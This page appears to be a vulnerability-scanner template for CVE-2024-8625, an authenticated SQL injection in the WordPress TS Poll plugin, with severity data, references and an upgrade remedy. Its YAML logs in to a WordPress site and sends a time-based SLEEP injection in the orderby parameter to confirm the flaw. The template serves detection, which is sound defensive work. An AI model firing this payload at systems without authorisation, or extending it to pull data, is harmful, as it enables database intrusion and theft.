WordPress TS Poll < 2.4.0 - SQL Injection
CVE-2024-8625
Verified
Description
WordPress TS Poll plugin < 2.4.0 contains a SQL injection caused by lack of sanitization and escaping of a parameter before using it in a SQL statement, letting attackers perform SQL injection attacks, exploit requires admin privileges.
Severity
High
CVSS Score
7.2
Exploit Probability
2%
Affected Product
ts_poll
Published Date
February 18, 2026
Template Author
riteshs4hu
CVE-2024-8625.yaml
id: CVE-2024-8625
info:
name: WordPress TS Poll < 2.4.0 - SQL Injection
author: riteshs4hu
severity: high
description: |
WordPress TS Poll plugin < 2.4.0 contains a SQL injection caused by lack of sanitization and escaping of a parameter before using it in a SQL statement, letting attackers perform SQL injection attacks, exploit requires admin privileges.
impact: |
Attackers can execute arbitrary SQL commands, potentially leading to data theft, modification, or deletion.
remediation: |
Update to version 2.4.0 or later.
reference:
- https://wpscan.com/vulnerability/ab4d7065-4ea2-4233-9593-0f540f91f45e/
- https://nvd.nist.gov/vuln/detail/CVE-2024-8625
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.2
cve-id: CVE-2024-8625
cwe-id: CWE-89
epss-score: 0.02277
epss-percentile: 0.80981
cpe: cpe:2.3:a:total-soft:ts_poll:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 2
vendor: total-soft
product: ts_poll
tags: cve,cve2024,wordpress,wp-plugin,wp,ts-poll,sqli,authenticated
flow: http(1) && http(2)
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&redirect_to={{RootURL}}/wp-admin/&testcookie=1
matchers:
- type: dsl
dsl:
- status_code == 302
- contains(header, "wordpress_logged_in")
condition: and
internal: true
- raw:
- |
@timeout: 30s
GET /wp-admin/admin.php?page=ts-poll&orderby=(SELECT+6127+FROM+(SELECT(SLEEP(7)))mIWx)&order=desc HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'duration >= 7'
- 'status_code == 200'
- 'contains(body, "All TS Poll")'
condition: and
# digest: 4a0a00473045022100cd382774a096aab70dd846ea037640aa8ecb9e35d466e8de91c64e1ec2b879900220215377b6b9af27ee66730d2004c2c621280ff965cfc4532f3a9ebafa6f9f2577:922c64590222798bb761d5b6d8e729507.2Score
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
CVE ID:
cve-2024-8625
CWE ID:
cwe-89
Remediation Steps
Update to version 2.4.0 or later.